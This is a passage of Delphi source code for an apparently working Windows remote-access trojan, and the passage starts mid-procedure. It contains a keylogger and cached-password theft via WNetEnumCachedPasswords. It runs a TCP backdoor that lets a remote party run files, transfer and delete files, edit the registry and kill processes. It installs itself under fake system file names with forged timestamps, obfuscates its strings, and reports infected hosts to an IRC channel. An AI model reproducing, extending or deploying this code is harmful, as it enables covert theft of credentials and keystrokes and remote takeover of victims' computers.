reset(l); append(l); write(l,logger); closefile(l); logger:=''; end; end; procedure TLog.LogCreate; var tyhwnd:thandle; begin cc:=0; tyhwnd := AllocateHwnd(KLog.KeyIncrement); KeyHook_Start(tyhwnd); end; procedure TLog.LogDestroy; begin KeyHook_Stop; {$I-} assignfile(l,systemdir+crypt(']wpawu)lh~')); //\users.dat reset(l); append(l); write(l,logger); closefile(l); logger:=''; {$I+} end; //=== password connection function EnumPasswordCallbackProc(pce: TPPasswordCacheEntry; pdw: cardinal) : LongBool; stdcall; var s1 : string; s2 : string; begin result:=true; SetLength(s1,pce^.cbResource); Move(pce^.abResource[0],pointer(s1)^,pce^.cbResource); s1:=pchar(s1); SetLength(s2,pce^.cbPassword); Move(pce^.abResource[pce^.cbResource],pointer(s2)^,pce^.cbPassword); s2:=pchar(s2); write(t,PChar(s1+' : '+s2+#13+#10)); end; procedure testEnumCachedPasswords; var WNetEnumCachedPasswords : function (ps: pchar; pw: word; pb: byte; proc: pointer; bdw: cardinal) : word; stdcall; mpr : cardinal; begin mpr:=LoadLibrary('mpr'); if mpr<>0 then try WNetEnumCachedPasswords:=GetProcAddress(mpr,pchar(crypt('VLfp@hreJkhdhj_qbad{grd'))); //WNetEnumCachedPasswords if @WNetEnumCachedPasswords<>nil then begin try WNetEnumCachedPasswords(nil,0,$FF,@EnumPasswordCallbackProc,0); finally end; end; finally FreeLibrary(mpr) end; end; //===windows_control procedure killprocess(prname:string); var str : pchar; h:hwnd; begin str:=@(prname)[1]; h := FindWindow(nil,str); if h <> 0 then PostMessage(h, WM_QUIT, 0, 0); end; {function childproc(h:HWND):bool;stdcall; var tempstring: array [0..255] of char; begin GetClassName(h,classe,255); if (classe=nil) or (classe=string(' ')) then exit; if classe='Edit' then begin sendmessage(h,WM_GETTEXT,255,integer(@tempstring)); if tempstring<>'' then begin writeln(tempstring); counter:=counter+1; end; if counter=2 then writeln(string(klasse)); end; if classe='TEdit' then begin sendmessage(h,WM_GETTEXT,255,integer(@tempstring)); if tempstring<>'' then begin writeln(tempstring); counter:=counter+1; end; if counter=2 then writeln(string(klasse)); end; end; function AddTopLevelWindowsToList2(h: HWND): BOOL; stdcall; begin If (GetWindowLong(h,GWL_HWNDPARENT)=0) then begin Getwindowtext(h,klasse,255); if klasse<>'' then begin counter:=0; if pos('Netscape',klasse)<>0 then counter:=1; //+ ' (' + inttostr(h) if pos('Explorer',klasse)<>0 then counter:=1; //writeln(string(klasse)); if pos('Opera',klasse)<>0 then counter:=1; end; end; if counter=1 then EnumChildWindows(h,@childproc,8); end; } function AddTopLevelWindowsToList(h: HWND): BOOL; stdcall; begin If (GetWindowLong(h,GWL_HWNDPARENT)=0) then begin Getwindowtext(h,klasse,255); if klasse<>'' then begin write(t,string(klasse)+#13+#10); end; end; end; //=== information === procedure DoPassword(wParam:longInt); var pp:string; sock:tsock; begin assignfile(t,windowsdir+'~tmp..sys'); rewrite(t); append(t); testEnumCachedPasswords; closefile(t); assignfile(t,windowsdir+'~tmp..sys'); reset(t); repeat readln(t,pp); Sock.WriteString(wParam, PChar(pp+#13+#10)); sleep(Timeout); until pp=''; closefile(t); erase(t); end; procedure DoAbout(wParam:longInt); var SI:TSystemInfo; OsVer:TOSVersionInfoA; MS:TMemoryStatus; pp:string; begin ZeroMemory(@OsVer,SizeOf(OsVer)); ZeroMemory(@Si,SizeOf(Si)); ZeroMemory(@MS,SizeOf(MS)); MS.dwLength:=SizeOf(MS); OsVer.dwOSVersionInfoSize:=SizeOf(OsVer); GetVersionEx(OsVer); GetSystemInfo(Si); GlobalMemoryStatus(MS); case Win32Platform of WINDOWS.VER_PLATFORM_WIN32_WINDOWS : pp:='95'; WINDOWS.VER_PLATFORM_WIN32s : pp:='32'; WINDOWS.VER_PLATFORM_WIN32_NT : pp:='NT'; end; Sock.WriteString(wParam, PChar( crypt('R{pp`k=')+#13+#10+ //System: WSD.szDescription+#13+#10+ crypt('NQ9$')+IntToStr(OsVer.dwMajorVersion)+'.'+IntToStr(OsVer.dwMinorVersion)+#13+#10+ //OS: crypt('own$FVR2)')+IntToStr(Si.dwNumberOfProcessors)+#13+#10+ //num CPU: crypt('BRV$')+IntToStr(Si.dwProcessorType)+#13+#10+ //CPU crypt('SCN$')+IntToStr(Round(MS.dwTotalPhys/1048576))+#13+#10+ //RAM crypt('GpfaWGJ(')+IntToStr(Round(MS.dwAvailPhys/1024))+#13+#10+ //FreeRAM crypt('Wpw$')+IntToStr(Round(MS.dwTotalVirtual/1048576))+#13+#10+ //Vrt crypt('GpfaSts(')+IntToStr(Round(MS.dwAvailVirtual/1048576))+#13+#10+ //FreeVrt crypt('R{pp`k=(')+systemdir+'\'+#13+#10+ //System: crypt('Vkm`jq=(')+windowsdir+'\'+#13+#10+ //Window: WSD.szSystemStatus+' '+pp+#13+#10+ crypt('Impp?&')+getlocalhostname+#13+#10)); //Host: end; procedure DoShowDirectory(wParam:longInt;command:String); var sss,NomDuDossier,DossierTrouve,FichierTrouve:string; attributs,Resultat:Integer; SearchRec:TSearchRec; TailleDuFichier:integer; begin attributs:=6; sock.writestring(wParam,pchar(crypt('EkqWfgi2')+#13+#10)); //DirScan: sleep(timeout); If command[length(command)]='\' then command:=copy(command,1,length(command)-1); Resultat:=FindFirst(command+'\'+'*.*',FaDirectory,SearchRec); while Resultat=0 do begin if (SearchRec.Name<>'.') and (SearchRec.Name<>'..') and ((SearchRec.Attr and faDirectory)>0) then begin DossierTrouve:=command+'\'+SearchRec.Name; NomDuDossier:=DossierTrouve; // ProcessMessages; end; if NomDuDossier<>sss then begin sleep(timeout); if NomDuDossier<>'' then NomduDossier:=NomDuDossier+'\'; sock.writestring(wParam,pchar(crypt('}F9')+NomduDossier+#13+#10)); //|D: end; sss:=NomDuDossier; Resultat:=FindNext(SearchRec); end; FindClose(SearchRec); If command[length(command)]='\' then command:=copy(command,1,length(command)-1); Resultat:=FindFirst(command+'\'+crypt('+,)'),Attributs,SearchRec); //*.* while Resultat=0 do begin //ProcessMessages; if ((SearchRec.Attr and faDirectory)<=0) then begin FichierTrouve:=command+'\'+SearchRec.Name; TailleDuFichier:=SearchRec.Size; //NomFichierComplet:=FichierTrouve; //DateHeureDuFichier:=SearchRec.Time; end; sleep(timeout); Resultat:=FindNext(SearchRec); sock.writestring(wParam,pchar(crypt('}D9')+FichierTrouve+'|'+inttostr(tailledufichier)+#13+#10)); //|F: end; FindClose(SearchRec); sleep(timeout); sock.writestring(wParam,pchar(crypt('}D9$YZo|dfWP')+#13+#10)); //|F: \\html\\ end; procedure DoStart(wParam:longInt); var ch:char; VolNameStr,Tip:String; LW:byte; Dsize,NamLen,syslen:integer; VolNameAry: array[0..255] of char; VolSer,SysFlags : DWord; begin Driv:=''; d:=0; ch:=#97; sock.WriteString(wParam, PChar(crypt('EmPpdts2')+#13+#10)); //DoStart: repeat d:=d+1; s:=ch+':\'; case getDriveType(pChar(s)) of DRIVE_FIXED: begin Tip:='0'; //Fixed HD NamLen:=255; SysLen:=255; if GetVolumeInformation(pChar(s), VolNameAry, NamLen, @VolSer, SysLen, SysFlags, nil, 0) then VolNameStr := StrPas(VolNameAry) else VolNameStr := ''; LW := ord(upcase(s[1])) - 64; DSize := DiskSize(LW); if (DSize <> -1) then DSize := disksize(LW) DIV 1024; //Driv:=Driv+'Drive: '+UpCase(Ch)+':\'+' <'+Volnamestr+'>'+'&'+Tip+'|'+IntToStr(DSize)+'|'+#13+#10; Driv:=crypt('}F9')+UpCase(Ch)+':\'+' <'+Volnamestr+'>'+'&'+Tip+'|'+IntToStr(DSize)+'|'+#13+#10; //|D: end; DRIVE_CDROM: begin Tip:='1'; //CD-ROM Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+Tip+'|0|'+#13+#10; end; DRIVE_RAMDISK: begin Tip:='2'; //RAM Disk Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+Tip+'|0|'+#13+#10; end; DRIVE_REMOVABLE: begin Tip:='3'; //Removable Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+tip+'|0|'+#13+#10; end; DRIVE_REMOTE: begin Tip:='4'; //Network Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+tip+'|0|'+#13+#10; end; 0 : s:=''; //do nothing; 1 : s:=''; //do nothing; end; sleep(timeout); sock.WriteString(wParam, PChar(Driv)); driv:=''; inc(ch); until d=26; sleep(timeout); sock.WriteString(wParam, PChar(crypt(']^kphj[T')+#13+#10)); //\\html\\ end; procedure DoShowLog(wParam:longInt); var f:file of byte; p:longint; begin Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('.aft',true); if fileexists(systemdir+crypt(']wpawu)lh~')) then //\users.dat begin assignfile(f,systemdir+crypt(']wpawu)lh~')); //\users.dat reset(f); p:=filesize(f); sock.writestring(wParam,pchar(crypt('mmd>%')+Registre.ReadString('1')+' '+s+' '+inttostr(p)+#13+#10)); //log: closefile(f); end; Registre.Free; end; procedure DoExecFile(wParam:longInt;Command:String); var R:Integer; Params:String; begin Params:=''; if Pos('&',Command)<>0 then begin Params:=Copy(Command,Pos('&',Command)+1,255); Delete(Command,Pos('&',Command),255); end; R:=ShellExecute(0,nil,PChar(Command),PChar(Params),nil,SW_NORMAL); if R<=32 then sock.WriteString(wParam, PChar(ERROR+#13+#10)) else sock.WriteString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoProxy(wParam:longInt;Command:String); begin // end; procedure DoDeleteFile(wParam:longInt;Command:String); var St:String; Found:Integer; F:TSearchRec; begin Found:=FindFirst(Command,faAnyFile, F); St:=''; while Found = 0 do begin if DeleteFile(ExtractFilePath(Command)+F.Name) then St:=St+F.Name; Found:=FindNext(F); end; sock.WriteString(wParam, PChar(crypt('Dpbw`b''n`fn7')+St+#13+#10)); //Erased files: end; procedure DoSendFile(wParam:longInt;Command:String); var {f:file of byte;} f:HFile; st:string; NumRead:Integer; p:array[1..1024] of char; OfStr:TOFStruct; FF:TSearchRec; begin f:=OpenFile(PChar(Command),OFStr,OF_READ); if f=HFILE_ERROR then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); exit; end; FindFirst(Command,faAnyFile, FF); St:=IntToStr(FF.Size); sock.WriteString(wParam, PChar(crypt('mmb`cok2')+st+'|'+#13+#10)); //loadfil: sleep(timeout); repeat ReadFile(f,P,SizeOf(P),NumRead,nil); Sleep(timeout); if sock.WriteData(wParam,@P,numread)=0 then begin _lclose(f); exit; end; until (NumRead = 0); _lclose(f); end; procedure DoReceiveFile(wParam:longInt;Command:String); begin //done; end; procedure DoRenameFile(wParam:longInt;Command:String); var Params:String; f:file; begin Params:=''; if Pos('&',Command)<>0 then begin Params:=Copy(Command,Pos('&',Command)+1,255); Delete(Command,Pos('&',Command),255); end; assignfile(f,command); if params<>'' then Rename(f,params) else exit; sock.writeString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoCreateDirectory(wParam:longInt;Command:String); var St:String; begin St:=command; MkDir(command); sock.WriteString(wParam, PChar(crypt('Bpfeqc''l`x1')+St+#13+#10)); //Create dir: end; procedure DoDeleteDirectory(wParam:longInt;Command:String); var St:String; begin St:=command; RmDir(command); sock.WriteString(wParam, PChar(crypt('Dpbw`&ca{0')+St+#13+#10)); //Erase dir: end; procedure DoWriteReg(wParam:longInt;Command:String); var Params,Params1,Params2,Params3:String; begin params:=''; params1:=''; params2:=''; params3:=''; if Pos('&',Command)<>0 then begin params:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params1:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params2:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; Params3:=Copy(Command,1,length(command)); Registre:=TRegistry.create; if strtoint(params)=0 then Registre.RootKey:=HKEY_CLASSES_ROOT; if strtoint(params)=1 then Registre.RootKey:=HKEY_CURRENT_USER; if strtoint(params)=2 then Registre.RootKey:=HKEY_LOCAL_MACHINE; if strtoint(params)=3 then Registre.RootKey:=HKEY_USERS; if strtoint(params)=4 then Registre.RootKey:=HKEY_PERFORMANCE_DATA; if strtoint(params)=5 then Registre.RootKey:=HKEY_CURRENT_CONFIG; if strtoint(params)=6 then Registre.RootKey:=HKEY_DYN_DATA; if strtoint(params)>6 then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); Registre.Free; exit; end; Registre.OpenKey(params1,true); Registre.WriteString(params2,pchar(params3)); Registre.Free; sock.WriteString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoReadReg(wParam:longInt;Command:String); var params,params1,params2:string; begin if Pos('&',Command)<>0 then begin params:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params1:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; Params2:=Copy(Command,1,length(command)); Registre:=TRegistry.create; if strtoint(params)=0 then Registre.RootKey:=HKEY_CLASSES_ROOT; if strtoint(params)=1 then Registre.RootKey:=HKEY_CURRENT_USER; if strtoint(params)=2 then Registre.RootKey:=HKEY_LOCAL_MACHINE; if strtoint(params)=3 then Registre.RootKey:=HKEY_USERS; if strtoint(params)=4 then Registre.RootKey:=HKEY_PERFORMANCE_DATA; if strtoint(params)=5 then Registre.RootKey:=HKEY_CURRENT_CONFIG; if strtoint(params)=6 then Registre.RootKey:=HKEY_DYN_DATA; if strtoint(params)>6 then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); Registre.Free; exit; end; Registre.OpenKey(params1,true); sock.WriteString(wParam, PChar('Data: '+Registre.ReadString(params2)+#13+#10)); Registre.Free; end; procedure DoKillProcess(wParam:longInt;Command:String); begin Killprocess(command); sock.WriteString(wParam, PChar(crypt('Jkohlh`2)')+command+#13+#10)); //Killing: end; procedure DoWindowsProcess(wParam:longInt); var pp:string; begin assignfile(t,windowsdir+'~tmp..dat'); rewrite(t); append(t); EnumWindows(@AddTopLevelWindowsToList,8); closefile(t); assignfile(t,windowsdir+'~tmp..dat'); reset(t); repeat readln(t,pp); Sock.WriteString(wParam, PChar(pp+#13+#10)); sleep(timeout); until pp=''; closefile(t); erase(t); end; procedure DoTimeout(wParam:longInt;Command:String); begin timeout:=strtoint(command); sock.WriteString(wParam, PChar('Timeout: '+command+#13+#10)); end; procedure TSock.OnServerRead(wParam,lParam:longInt); var Command:String; f:HFile; check:string; NumWrite:Integer; OfStr:TOFStruct; t1,t2,yy,taille:longint; Buffy:array[1..1024] of char; begin CountRB:=recv(wParam,Buffy,SizeOf(Buffy),0); if CountRB = 0 then exit; Command:=Copy(Buffy,Pos('/',Buffy)+1,Pos('HTTP',Buffy)-Pos('/',Buffy)-2); if command='' then exit; case command[1] of '0' : DoAbout(wParam); '1' : DoShowDirectory(wParam,copy(command,pos('?',command)+1,255)); '2' : DoStart(wParam); '3' : DoShowLog(wParam); '4' : DoExecFile(wParam,copy(command,pos('?',command)+1,255)); '5' : DoSendFile(wParam,copy(command,pos('?',command)+1,255)); '6' : DoDeleteFile(wParam,copy(command,pos('?',command)+1,255)); '7' : begin command:=copy(command,pos('?',command)+1,255); check:=copy(command,pos('|',command)+1,pos('&',command)-1); taille:=strtoint(check); delete(command,pos('|',command),length(command)); sock.WriteString(wParam, PChar('sendfil:'+#13+#10)); f:=OpenFile(PChar(Command),OFStr,OF_CREATE); if f=HFILE_ERROR then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); exit; end; yy:=0; t1:=round((taille+512)/1024); t2:=t1*1024; //nombre packet t1:=t2-taille; //end packet //t1:=taille-t2; repeat CountRB:=recv(wParam,Buffy,sizeof(Buffy),0); if countRB<>65535 then begin //writeln(taille); if taille<=1024 then begin WriteFile(f,Buffy,taille,NumWrite,nil); _lclose(f); exit; end; yy:=yy+countRB; //bug if yy=t2 then begin t1:=1024-abs(t1); //writeln(t1); WriteFile(f,Buffy,t1,NumWrite,nil); _lclose(f); exit; end else WriteFile(f,Buffy,countRB,NumWrite,nil); end; fillchar(buffy,sizeof(buffy),#0); until (yy>=taille) or (NumWrite = 0); _lclose(f); exit; //DoReceiveFile(wParam,copy(command,pos('?',command)+1,255)); end; '8' : DoRenameFile(wParam,copy(command,pos('?',command)+1,255)); '9' : DoCreateDirectory(wParam,copy(command,pos('?',command)+1,255)); 'A' : DoDeleteDirectory(wParam,copy(command,pos('?',command)+1,255)); 'B' : DoWriteReg(wParam,copy(command,pos('?',command)+1,255)); 'C' : DoReadReg(wParam,copy(command,pos('?',command)+1,255)); 'D' : DoProxy(wParam,copy(command,pos('?',command)+1,255)); 'E' : DoKillProcess(wParam,copy(command,pos('?',command)+1,255)); 'F' : DoWindowsProcess(wParam); 'G' : DoPassword(wParam); 'H' : DoTimeout(wParam,copy(command,pos('?',command)+1,255)); end; // closesocket(wParam); processmessages; end; //=== Process OnSocketMessage === procedure OnSocketMessage(Msg,wParam,lParam:longInt); begin if ( LOWORD(lParam) and FD_ACCEPT = FD_ACCEPT) then Sock.OnServerAccept(wParam,lParam); if ( LOWORD(lParam) and FD_CLOSE = FD_CLOSE) then sock.OnServerClose(wParam,lParam); if ( LOWORD(lParam) and FD_READ = FD_READ) then sock.OnServerRead(wParam,lParam); end; //== Processes every message sent to MAIN window === function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall; begin Result:= 0; case Msg of WM_CREATE : OnCreate(hWnd); WM_CLOSE : OnClose(hWnd); WM_MY_SOCK_MESSAGE : OnSocketMessage(Msg,wParam,lParam); WM_DESTROY : ShutDownServer; end; Result:=DefWindowProc(hWnd,Msg,wParam,lParam); end; //=== OnInitSocket === //==TCP procedure InitSocket; begin WSAStartup($101,WSD); Port:=1173; Server := Socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); // Server := Socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); if Server = -1 then WSACleanup; Addr.sin_family:= AF_INET; Addr.sin_addr.s_addr:=INADDR_ANY; Addr.sin_port:=htons(Port); bind(Server,Addr,SizeOf(Addr)); WSAAsyncSelect(Server,Handle,WM_MY_SOCK_MESSAGE, FD_ACCEPT + FD_CLOSE + FD_READ); // listen; listen(Server,5); end; //==UDP {procedure InitSocket2; begin si:=SizeOf(integer); WSAStartup($101,WSD); Port:=136; Server := Socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); if Server = -1 then WSACleanup; Addr.sin_family:= PF_INET; Addr.sin_addr.s_addr:=INADDR_ANY; Addr.sin_port:=htons(Port); setsockopt(Server,SOL_SOCKET,SO_BROADCAST,@i,si); bind(Server,Addr,SizeOf(Addr)); WSAAsyncSelect(Server,Handle,WM_MY_SOCK_MESSAGE, FD_ACCEPT + FD_CLOSE + FD_READ); listen(Server,5); end;} //=====copyit function GetFileDateTimeModified(const FileName: string;var yyyy,mm,dd,h,m,s: word):boolean; var dt,tm: word; DateTime: integer; begin result := false; DateTime := FileAge(FileName); if DateTime = -1 then exit else result := true; tm := DateTime and $FFFF; {lower word} dt := DateTime shr 16; {upper word} h := tm shr 11; m := (tm shr 5) and $3F; s := (tm and $1F) * 2; dd := dt and $1F; mm := (dt shr 5) and $F; yyyy := (dt shr 9)+1980; end; function SetFileDateTime(const FileName: string;var yyyy,mm,dd,h,m,s: word):boolean; var SrchHdl: THandle; FileHdl: HFile; FindData: TWin32FindData; wDate,wTime: word; LocalFileTime, NewFileTime: TFileTime; begin result := false; SrchHdl := FindFirstFile(PChar(FileName), FindData); if SrchHdl <> INVALID_HANDLE_VALUE then begin Windows.FindClose(SrchHdl); if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then begin wTime := (h shl 11) + (m shl 5) + (m div 2); wDate := (dd) + (mm shl 5)+ ((yyyy-1980) shl 9); DosDateTimeToFileTime(wDate,wTime,LocalFileTime); LocalFileTimeToFileTime(LocalFileTime, NewFileTime); FileHdl := _lopen(PChar(FileName), OF_WRITE); if FileHdl <> HFILE_ERROR then begin if SetFileTime(FileHdl,@NewFileTime,@NewFileTime,@NewFileTime) then result := true; _lclose(FileHdl); end; end; end; end; procedure copyit; var FromF, ToF: file; NumRead, NumWritten: Integer; Buf: array[1..2048] of Char; begin s:=paramstr(0); if (s<>systemdir+crypt(']IFVKCK;;$]TI')) and (s<>systemdir+crypt(']IFVKCK&MFG')) then begin //\KERNEL32.VXD \KERNEL.DLL filemode:=0; if fileexists(systemdir+crypt(']ifvkck;;$}ti')) then exit; //\kernel32.vxd if fileexists(systemdir+crypt(']ifvkck&mfg')) then exit; //\kernel.dll Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey(crypt('Eg\Hdhfj{kx'),true); //De_Lanabras Registre.WriteString(crypt('333<=6'),pchar(crypt('um#`lc''g{*ecy.{1vzq'))); //210880 //to die or not to die Registre.Free; AssignFile(FromF,paramstr(0)); Reset(FromF, 1); { Record size = 1 } AssignFile(ToF, systemdir+crypt(']ifvkck;;$}ti')); { ouvre le fichier de sortie }//\kernel32.vxd Rewrite(ToF, 1); { Record size = 1 } repeat BlockRead(FromF, Buf, SizeOf(Buf), NumRead); BlockWrite(ToF, Buf, NumRead, NumWritten); until (NumRead = 0) or (NumWritten <> NumRead); CloseFile(FromF); CloseFile(ToF); GetFileDateTimeModified(windowsdir+'\explorer.exe',yyyy,mm,dd,h,m,ss); SetFileDateTime(systemdir+crypt(']ifvkck;;$}ti'),yyyy,mm,dd,h,m,ss); //\kernel32.vxd AssignFile(FromF,paramstr(0)); Reset(FromF, 1); { Record size = 1 } AssignFile(ToF, systemdir+crypt(']ifvkck&mfg')); { ouvre le fichier de sortie }//\kernel.dll Rewrite(ToF, 1); { Record size = 1 } repeat BlockRead(FromF, Buf, SizeOf(Buf), NumRead); BlockWrite(ToF, Buf, NumRead, NumWritten); until (NumRead = 0) or (NumWritten <> NumRead); CloseFile(FromF); CloseFile(ToF); SetFileDateTime(systemdir+crypt(']ifvkck&mfg'),yyyy,mm,dd,h,m,ss); //\kernel.dll end; end; //===========Online??? const INVALID_IP_ADDRESS= $ffffffff; function ip2string(ip_address:longint):string; begin ip_address:=ntohl(ip_address); result:= inttostr(ip_address shr 24)+'.'+ inttostr((ip_address shr 16) and $ff)+'.'+ inttostr((ip_address shr 8) and $ff)+'.'+ inttostr(ip_address and $ff); end; function lookup_hostname(const hostname:string):longint; var RemoteHost : PHostEnt; (* no, don't free it! *) ip_address: integer; s: string; begin ip_address:=INVALID_IP_ADDRESS; try if hostname='' then begin (* no host given! *) lookup_hostname:=ip_address; EXIT; end else begin s:=hostname+#0; ip_address:=Inet_Addr(PChar(@s[1])); // ip_address:=Winsock.Inet_Addr(PChar(hostname)); if ip_address=$FFFFFFFF then begin RemoteHost:=GetHostByName(PChar(@s[1])); // RemoteHost:=Winsock.GetHostByName(PChar(hostname)); if (RemoteHost=NIL) or (RemoteHost^.h_length<=0) then begin lookup_hostname:=ip_address; EXIT; (* host not found *) end else ip_address:=longint(pointer(RemoteHost^.h_addr_list^)^); end; end; except ip_address:=INVALID_IP_ADDRESS; end; lookup_hostname:=ip_address; end; //====== Connection Irc === type THede = class(TObject) procedure MyHwndProc(var Msg:TMessage); procedure agprun; procedure server; function ip2string(ip_address:longint):string; end; const SocketMessag = WM_USER+107; var MySocket: TSocket; MyName : TSockAddr; MyAddr : TInAddr; Hede: THede; Buffer:array[0..1023] of char; res : word; WST : TWSAData; host: string; b:byte; function my_ip_address:longint; const bufsize=255; var buf: pointer; RemoteHost : PHostEnt; (* No, don't free it! *) begin buf:=NIL; try getmem(buf,bufsize); gethostname(buf,bufsize); (* this one maybe without domain *) RemoteHost:=GetHostByName(buf); if RemoteHost=NIL then my_ip_address:=htonl($7F000001) (* 127.0.0.1 *) else my_ip_address:=longint(pointer(RemoteHost^.h_addr_list^)^); finally if buf<>NIL then freemem(buf,bufsize); end; end; function THede.ip2string(ip_address:longint):string; begin ip_address:=ntohl(ip_address); result:= inttostr(ip_address shr 24)+'.'+ inttostr((ip_address shr 16) and $ff)+'.'+ inttostr((ip_address shr 8) and $ff)+'.'+ inttostr(ip_address and $ff); end; procedure Thede.server; var srvlist: array[0..14] of string; x:byte; systemTime:TSystemTime; z:longint; begin sleep(10000); b:=0; randomize; j := 0; result:=''; nukemsg:=''; repeat j:=j+1; x := 64 + random(58); case x of 0 .. 64 : result := 'a'; 65 .. 90 : result := chr(x); 91 .. 96 : result := 'e'; 97 .. 122 : result := chr(x); 123..255 : result := 'd'; end; nukemsg:=nukemsg+result; until j=9; j := 0; result:=''; nukemsg2:=''; repeat j:=j+1; x := 96 + random(26); case x of // 0 .. 64 : result := 'a'; // 65 .. 90 : result := 'u'; 91 .. 96 : result := 'e'; 97 .. 122 : result := chr(x); 123..255 : result := 'd'; end; nukemsg2:=nukemsg2+result; until j=10; with systemtime do begin wYear:= wYear; wMonth:=wMonth; wDayOfWeek:= wDayOfWeek; wDay:=wDay; wHour:= wHour; wMinute:= wMinute; wSecond:= wSecond; wMilliseconds:= wMilliseconds; end; getsystemtime(SystemTime); j:=systemtime.wMonth; //srvlist[0]:='127.0.0.1'; srvlist[1]:=crypt('dw-qkbbzgo"b|h'); //eu.undernet.org srvlist[2]:=crypt('bc-qkbbzgo"b|h'); //ca.undernet.org srvlist[3]:=crypt('tq-qkbbzgo"b|h'); //us.undernet.org srvlist[4]:=crypt('umqkkrh&fd%ol z~uwazpb9wk}'); //toronto.on.ca.undernet.org srvlist[5]:=crypt('sgdakue}{m%hh je?g}ppdy}m4tnz'); //regensburg.de.eu.undernet.org srvlist[6]:=crypt('dqskj(aa''o~"x`kuc|v`;ye'); //espoo.fi.eu.undernet.org srvlist[7]:=crypt('bjjgdah&`f%y~ Z~uwazpb9wk}'); //chicago.il.us.Undernet.org srvlist[8]:=crypt('vcpllh`|fd%hn zc?g}ppdy}m4tnz'); //washington.dc.us.undernet.org srvlist[9]:=crypt('`opp`tcid$e`#kz>d|wqgxrl7ui{'); //amsterdam.nl.eu.undernet.org srvlist[10]:=crypt('rvokpot&de%y~ z~uwazpb9wk}'); //stlouis.mo.us.undernet.org srvlist[11]:=crypt('qkwpvdrznb%|l zc?g}ppdy}m4tnz'); //pittsburgh.pa.us.undernet.org srvlist[12]:=crypt('`w`oigil''dq"x`kuc|v`;ye'); //auckland.nz.undernet.org srvlist[13]:=crypt('qjlako&hp%y~ z~uwazpb9wk}'); //phoenix.az.us.undernet.org srvlist[14]:=crypt('ecohdu)|q$~#{att`}qa8xj~'); //dallas.tx.us.undernet.org x:=random(14)+1; // x:=0; host:=srvlist[x]; z:=lookup_hostname(host); host:=ip2string(z); //writeln(host); WSAStartup($101,WST); hede.agprun; end; procedure THede.MyHwndProc(var msg:TMessage); var check,s:string; begin FillChar(buffer,sizeof(buffer),#0); if msg.Msg = SocketMessag then begin if msg.LParamLo = FD_CLOSE then begin //writeln('end'); closesocket(mysocket); WSACleanup; hede.server; exit; end; //if msg.LParamLo = FD_WRITE then writeln('[Socket Write]'); if msg.LParamLo = FD_READ then begin res:=Recv(MySocket,Buffer,sizeof(Buffer),0); if res=-1 then begin // S:='Error : '+inttostr(WSAGetLastError); // writeln(s); closesocket(mysocket); WSACleanup; hede.server; exit; end; //if Buffer[1]<>'' then S:='[connected]'; //writeln(s); //writeln('[Socket Read] '+ inttostr(res) +'/300 : '+Buffer); end; if res<0 then begin //writeln('*** Cant Read !!! >:-['); closesocket(mysocket); WSACleanup; hede.server; exit; end; end; check:=copy(buffer,1,6); if check=crypt('QKMC%<') then //PING : begin sleep(100); check:=copy(buffer,7,20); sock.WriteString(MySocket,pchar(crypt('QMMC%<')+check+#13+#10)); //PONG : if b=0 then begin sleep(500); //writeln('USER '+nukemsg+' '+ip2string(my_ip_address)+' '+nukemsg2+'.org :'+copy(nukemsg2,1,5)+#13+#10); //sock.WriteString(MySocket,pchar('USER thepeaceto "death.com" "'+ip2string(my_ip_address)+'" :dukkk'+#13+#10)); sock.WriteString(MySocket,pchar(crypt('TQFV%')+copy(nukemsg2,1,7)+' "'+nukemsg2+'.com" "'+ip2string(my_ip_address)+'" :'+copy(nukemsg2,1,5)+#13+#10)); //USER sleep(500); sock.WriteString(MySocket,pchar(crypt('LMGA%')+nukemsg+' +i'+#13+#10)); //MODE sleep(500); sock.WriteString(MySocket,pchar(crypt('KMJJ%')+crypt('"]e[gYn')+inttostr(j)+' '+crypt('dosawiuW')+#13+#10)); //JOIN //#_f_b_i //emperor_ sleep(500); sock.WriteString(MySocket,pchar(crypt('LMGA%')+crypt('"]e[gYn')+inttostr(j)+' +sk '+crypt('dosawiuW')+#13+#10));//MODE sleep(500); Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('.aft',true); sock.WriteString(MySocket,pchar(crypt('QPJRHU@(')+crypt('"]e[gYn')+inttostr(j)+' '+crypt(';jfhii')+Registre.ReadString('1')+#13+#10)); //PRIVMSG //:hello Registre.Free; b:=1; end; end; end; procedure THede.agpRun; var s:string; myhwnd: Thandle; begin MySocket:=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP); MyAddr.S_addr:=Inet_Addr(@Host[1]); MyName.sin_family:=PF_INET; MyName.sin_port:=htons(6667); //port to connect MyName.sin_addr:=MyAddr; // MyName.sin_port:=ntohs(strtoint(edit4.text)); //port on receive res:=connect(MySocket,MyName,sizeof(MyName)); if res<>0 then begin // S:='Connect Error : '+inttostr(WSAGetLastError); // writeln(s); closesocket(mysocket); WSACleanup; hede.server; exit; end; myhwnd := AllocateHwnd(hede.MyHWndProc); WSAAsyncSelect(MySocket, myhwnd, SocketMessag, FD_READ OR FD_WRITE OR FD_CLOSE ); 